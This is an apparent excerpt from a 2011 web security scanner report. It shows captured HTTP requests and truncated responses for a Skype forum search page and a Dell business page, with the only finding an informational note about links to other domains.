GET /t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: community.skype.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; LiSESSIONID=3607C6434AF107556B11C2CE05ECE91B

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:56 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 128577
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Search - Sky
...[SNIP]...
</link>    
       
           
       <link href="http://skypec.i.lithium.com/skins/HEAD/170EBA33ED381EA1B9A6C00931184AB7/skype1307366537.css" rel="stylesheet" type="text/css"></link>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>

<link rel="stylesheet" href="http://www.skypeassets.com/i/css/turbo/buttons.css" type="text/css" media="screen,print"/>
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/turbo/grid.css" type="text/css" media="screen,print"/>
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/turbo/navigation.css" type="text/css" media="screen"/>

<!-- Icon -->
<link rel="icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico" type="image/vnd.microsoft.icon"/>
<link rel="shortcut icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico"/>
<link rel="apple-touch-icon" href="http://www.skypeassets.com/i/images/logos/skype_webclip.png"/>

<!-- CSS for the Skype forum header -->
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
<a class="lia-link-navigation lia-form-fieldset-toggle lia-js-hidden" id="link_3" href="#"><img class="" title="Toggle Close" alt="Toggle Close" id="display" src="http://skypec.i.lithium.com/skins/images/F941FFDE452801903B8D5055904D5977/base/images/icon_toggle_open.png"/></a>
           <a class="lia-link-navigation lia-form-fieldset-toggle" id="link_4" href="#"><img class="" title="Toggle Open" alt="Toggle Open" id="display_0" src="http://skypec.i.lithium.com/skins/images/77D3E9B8424B1CA1020EF4271C42C7E7/base/images/icon_toggle_closed.png"/></a>
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Community" id="imagedisplay" src="http://skypec.i.lithium.com/skins/images/6AB44F2C1D5933E04C0E6DF6576F2296/base/images/icon_community.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Community:skypec lia-js-data-coreNodeDisplayId-skypec lia-component-forums-widget-community-node-tree-item" id="link_6" href="/">
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_0" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:English lia-js-data-coreNodeDisplayId-English lia-component-forums-widget-community-node-tree-item" id="link_8" href="/t5/English/
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_1" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:Frequently_asked lia-js-data-coreNodeDisplayId-Frequently_asked lia-component-forums-widget-community-node-tree-item" id="link_10"
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_2" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:Computer lia-js-data-coreNodeDisplayId-Computer lia-component-forums-widget-community-node-tree-item" id="link_12" href="/t5/Compu
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_3" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:Mobile lia-js-data-coreNodeDisplayId-Mobile lia-component-forums-widget-community-node-tree-item" id="link_14" href="/t5/Mobile/ct
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_4" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:Account lia-js-data-coreNodeDisplayId-Account lia-component-forums-widget-community-node-tree-item" id="link_16" href="/t5/My-Acco
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_5" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:General_discussion lia-js-data-coreNodeDisplayId-General_discussion lia-component-forums-widget-community-node-tree-item" id="link
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_6" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:Products lia-js-data-coreNodeDisplayId-Products lia-component-forums-widget-community-node-tree-item" id="link_20" href="/t5/Produ
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_7" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:Business lia-js-data-coreNodeDisplayId-Business lia-component-forums-widget-community-node-tree-item" id="link_22" href="/t5/Skype
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_8" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:Skype_Garage lia-js-data-coreNodeDisplayId-Skype_Garage lia-component-forums-widget-community-node-tree-item" id="link_24" href="/
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_9" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:Welcome lia-js-data-coreNodeDisplayId-Welcome lia-component-forums-widget-community-node-tree-item" id="link_25" href="/t5/Welcome-Ge
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_10" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:de lia-js-data-coreNodeDisplayId-de lia-component-forums-widget-community-node-tree-item" id="link_27" href="/t5/Deutsch/ct-p/de">
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_11" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:de_computer lia-js-data-coreNodeDisplayId-de_computer lia-component-forums-widget-community-node-tree-item" id="link_29" href="/t5
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_12" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:de_general lia-js-data-coreNodeDisplayId-de_general lia-component-forums-widget-community-node-tree-item" id="link_30" href="/t5/Allg
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_13" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:de_payment lia-js-data-coreNodeDisplayId-de_payment lia-component-forums-widget-community-node-tree-item" id="link_31" href="/t5/Zahl
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_14" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:de_mobile_smartphones lia-js-data-coreNodeDisplayId-de_mobile_smartphones lia-component-forums-widget-community-node-tree-item" id="l
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_15" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:de_hardware lia-js-data-coreNodeDisplayId-de_hardware lia-component-forums-widget-community-node-tree-item" id="link_33" href="/t5/Sk
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_16" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:fr lia-js-data-coreNodeDisplayId-fr lia-component-forums-widget-community-node-tree-item" id="link_35" href="/t5/Fran%C3%A7ais/ct-
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_17" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:fr_general lia-js-data-coreNodeDisplayId-fr_general lia-component-forums-widget-community-node-tree-item" id="link_36" href="/t5/La-c
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_18" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:fr_community lia-js-data-coreNodeDisplayId-fr_community lia-component-forums-widget-community-node-tree-item" id="link_37" href="/t5/
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_19" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:fr_hardware lia-js-data-coreNodeDisplayId-fr_hardware lia-component-forums-widget-community-node-tree-item" id="link_38" href="/t5/Le
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_20" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:fr_products lia-js-data-coreNodeDisplayId-fr_products lia-component-forums-widget-community-node-tree-item" id="link_39" href="/t5/Le
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_21" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:pt lia-js-data-coreNodeDisplayId-pt lia-component-forums-widget-community-node-tree-item" id="link_41" href="/t5/Portugu%C3%AAs/ct
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_22" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:pt_platforms lia-js-data-coreNodeDisplayId-pt_platforms lia-component-forums-widget-community-node-tree-item" id="link_43" href="/
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_23" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:pt_general lia-js-data-coreNodeDisplayId-pt_general lia-component-forums-widget-community-node-tree-item" id="link_44" href="/t5/T%C3
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_24" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:pt_payment lia-js-data-coreNodeDisplayId-pt_payment lia-component-forums-widget-community-node-tree-item" id="link_45" href="/t5/Form
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_25" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:pt_business lia-js-data-coreNodeDisplayId-pt_business lia-component-forums-widget-community-node-tree-item" id="link_46" href="/t5/Sk
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_26" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:it lia-js-data-coreNodeDisplayId-it lia-component-forums-widget-community-node-tree-item" id="link_48" href="/t5/Italiano/ct-p/it"
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_27" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:it_payment lia-js-data-coreNodeDisplayId-it_payment lia-component-forums-widget-community-node-tree-item" id="link_49" href="/t5/Paga
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_28" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:it_general lia-js-data-coreNodeDisplayId-it_general lia-component-forums-widget-community-node-tree-item" id="link_50" href="/t5/Disc
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_29" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:it_support lia-js-data-coreNodeDisplayId-it_support lia-component-forums-widget-community-node-tree-item" id="link_51" href="/t5/Supp
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_30" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:it_community lia-js-data-coreNodeDisplayId-it_community lia-component-forums-widget-community-node-tree-item" id="link_52" href="/t5/
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_31" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:it_mac lia-js-data-coreNodeDisplayId-it_mac lia-component-forums-widget-community-node-tree-item" id="link_53" href="/t5/Utenti-Mac/b
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_32" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:es lia-js-data-coreNodeDisplayId-es lia-component-forums-widget-community-node-tree-item" id="link_55" href="/t5/Espa%C3%B1ol/ct-p
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_33" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:es_platforms lia-js-data-coreNodeDisplayId-es_platforms lia-component-forums-widget-community-node-tree-item" id="link_57" href="/
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_34" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:es_payment lia-js-data-coreNodeDisplayId-es_payment lia-component-forums-widget-community-node-tree-item" id="link_58" href="/t5/P%C3
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_35" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:es_general lia-js-data-coreNodeDisplayId-es_general lia-component-forums-widget-community-node-tree-item" id="link_59" href="/t5/Disc
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_36" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:es_hardware lia-js-data-coreNodeDisplayId-es_hardware lia-component-forums-widget-community-node-tree-item" id="link_60" href="/t5/Ac
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_37" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:jp lia-js-data-coreNodeDisplayId-jp lia-component-forums-widget-community-node-tree-item" id="link_62" href="/t5/%E6%97%A5%E6%9C%A
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_38" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:jp_general lia-js-data-coreNodeDisplayId-jp_general lia-component-forums-widget-community-node-tree-item" id="link_63" href="/t5/%E6%
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_39" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:ru lia-js-data-coreNodeDisplayId-ru lia-component-forums-widget-community-node-tree-item" id="link_65" href="/t5/%D0%A0%D1%83%D1%8
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_40" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:ru_account lia-js-data-coreNodeDisplayId-ru_account lia-component-forums-widget-community-node-tree-item" id="link_67" href="/t5/%
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_41" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:ru_community lia-js-data-coreNodeDisplayId-ru_community lia-component-forums-widget-community-node-tree-item" id="link_69" href="/
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_42" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:ru_mobile lia-js-data-coreNodeDisplayId-ru_mobile lia-component-forums-widget-community-node-tree-item" id="link_71" href="/t5/Sky
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_43" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:ru_general_board lia-js-data-coreNodeDisplayId-ru_general_board lia-component-forums-widget-community-node-tree-item" id="link_73"
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_44" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:fb_en lia-js-data-coreNodeDisplayId-fb_en lia-component-forums-widget-community-node-tree-item" id="link_75" href="/t5/Facebook/ct
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_45" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:fb_en_app lia-js-data-coreNodeDisplayId-fb_en_app lia-component-forums-widget-community-node-tree-item" id="link_76" href="/t5/Facebo
...[SNIP]...
<a class="lia-link-navigation lia-form-fieldset-toggle" id="link_77" href="#"><img class="" title="Toggle Close" alt="Toggle Close" id="display_1" src="http://skypec.i.lithium.com/skins/images/F941FFDE452801903B8D5055904D5977/base/images/icon_toggle_open.png"/></a>
           <a class="lia-link-navigation lia-form-fieldset-toggle lia-js-hidden" id="link_78" href="#"><img class="" title="Toggle Open" alt="Toggle Open" id="display_2" src="http://skypec.i.lithium.com/skins/images/77D3E9B8424B1CA1020EF4271C42C7E7/base/images/icon_toggle_closed.png"/></a>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_79" href="#"><img class="" id="display_3" src="http://skypec.i.lithium.com/skins/images/CD42447200EF353C90A0578E1A3693D4/base/images/icon_help.png"/></a>
...[SNIP]...
<a class="lia-link-navigation lia-form-fieldset-toggle" id="link_81" href="#"><img class="" title="Toggle Close" alt="Toggle Close" id="display_4" src="http://skypec.i.lithium.com/skins/images/F941FFDE452801903B8D5055904D5977/base/images/icon_toggle_open.png"/></a>
           <a class="lia-link-navigation lia-form-fieldset-toggle lia-js-hidden" id="link_82" href="#"><img class="" title="Toggle Open" alt="Toggle Open" id="display_5" src="http://skypec.i.lithium.com/skins/images/77D3E9B8424B1CA1020EF4271C42C7E7/base/images/icon_toggle_closed.png"/></a>
...[SNIP]...
<a class="lia-link-navigation lia-form-fieldset-toggle" id="link_83" href="#"><img class="" title="Toggle Close" alt="Toggle Close" id="display_6" src="http://skypec.i.lithium.com/skins/images/F941FFDE452801903B8D5055904D5977/base/images/icon_toggle_open.png"/></a>
           <a class="lia-link-navigation lia-form-fieldset-toggle lia-js-hidden" id="link_84" href="#"><img class="" title="Toggle Open" alt="Toggle Open" id="display_7" src="http://skypec.i.lithium.com/skins/images/77D3E9B8424B1CA1020EF4271C42C7E7/base/images/icon_toggle_closed.png"/></a>
...[SNIP]...
<a class="lia-link-navigation lia-form-fieldset-toggle" id="link_85" href="#"><img class="" title="Toggle Close" alt="Toggle Close" id="display_8" src="http://skypec.i.lithium.com/skins/images/F941FFDE452801903B8D5055904D5977/base/images/icon_toggle_open.png"/></a>
           <a class="lia-link-navigation lia-form-fieldset-toggle lia-js-hidden" id="link_86" href="#"><img class="" title="Toggle Open" alt="Toggle Open" id="display_9" src="http://skypec.i.lithium.com/skins/images/77D3E9B8424B1CA1020EF4271C42C7E7/base/images/icon_toggle_closed.png"/></a>
...[SNIP]...
<a class="lia-link-navigation lia-form-fieldset-toggle" id="link_87" href="#"><img class="" title="Toggle Close" alt="Toggle Close" id="display_10" src="http://skypec.i.lithium.com/skins/images/F941FFDE452801903B8D5055904D5977/base/images/icon_toggle_open.png"/></a>
           <a class="lia-link-navigation lia-form-fieldset-toggle lia-js-hidden" id="link_88" href="#"><img class="" title="Toggle Open" alt="Toggle Open" id="display_11" src="http://skypec.i.lithium.com/skins/images/77D3E9B8424B1CA1020EF4271C42C7E7/base/images/icon_toggle_closed.png"/></a>
...[SNIP]...
<a id="advancedSearchPanel" href="#">
               <img class="lia-panel-heading-bar-controls-icon-maximize" style="display:none" title="Show" id="controlsMax" src="http://skypec.i.lithium.com/skins/images/271C13B8648D69AC6D1620FA03A61C16/base/images/icon_panel_maximize.png"/>    
               <img class="lia-panel-heading-bar-controls-icon-minimize" style="display:block" title="Hide" id="controlsMin" src="http://skypec.i.lithium.com/skins/images/E7B378E50AFBEEB9E5E71D8FCD1066D6/base/images/icon_panel_minimize.png"/>    
           </a>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_89" href="#"><img class="" id="display_12" src="http://skypec.i.lithium.com/skins/images/CD42447200EF353C90A0578E1A3693D4/base/images/icon_help.png"/></a>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_91" href="#"><img class="" id="display_13" src="http://skypec.i.lithium.com/skins/images/CD42447200EF353C90A0578E1A3693D4/base/images/icon_help.png"/></a>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_93" href="#"><img class="" id="display_14" src="http://skypec.i.lithium.com/skins/images/CD42447200EF353C90A0578E1A3693D4/base/images/icon_help.png"/></a>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_95" href="#"><img class="" id="display_15" src="http://skypec.i.lithium.com/skins/images/CD42447200EF353C90A0578E1A3693D4/base/images/icon_help.png"/></a>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_97" href="#"><img class="" id="display_16" src="http://skypec.i.lithium.com/skins/images/CD42447200EF353C90A0578E1A3693D4/base/images/icon_help.png"/></a>
...[SNIP]...
<a class="lia-link-navigation lia-custom-event" id="link_100" href="/t5/forums/searchpage/tab/message?filter=location&amp;location=Category%3AEnglish&amp;q=xss"><img class="" title="Remove" alt="Remove" id="display_17" src="http://skypec.i.lithium.com/skins/images/BC36DEC605FE10E8B92393A09CF7696A/base/images/button_inline_delete.png"/></a>
...[SNIP]...
<div class="search-result-message-icon">
                       <img class="" title="Topic" alt="There are no new messages in this topic" id="display_18" src="http://skypec.i.lithium.com/skins/images/3663AFAE585B432DF75A67342E97725A/base/images/icon_thread.png"/>
                   </div>
...[SNIP]...
<div class="LithiumLogo lia-component-common-widget-lithium-logo" class="LithiumLogo">
   <a class="lia-link-navigation" title="Social CRM &amp; Community Solutions Powered by Lithium" target="_blank" id="lithiumLogoLink" href="http://www.lithium.com/"><img class="" title="Social CRM &amp; Community Solutions Powered by Lithium" alt="Powered by Lithium" id="display_19" src="http://skypec.i.lithium.com/skins/images/7CE6893D65E55F411F0162C285E0145B/base/images/button_lithium_logo.png"/></a>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js"></script>
...[SNIP]...

17.22. http://content.dell.com/us/en/business/security-network.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.dell.com
Path:   /us/en/business/security-network.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673 HTTP/1.1
Host: content.dell.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
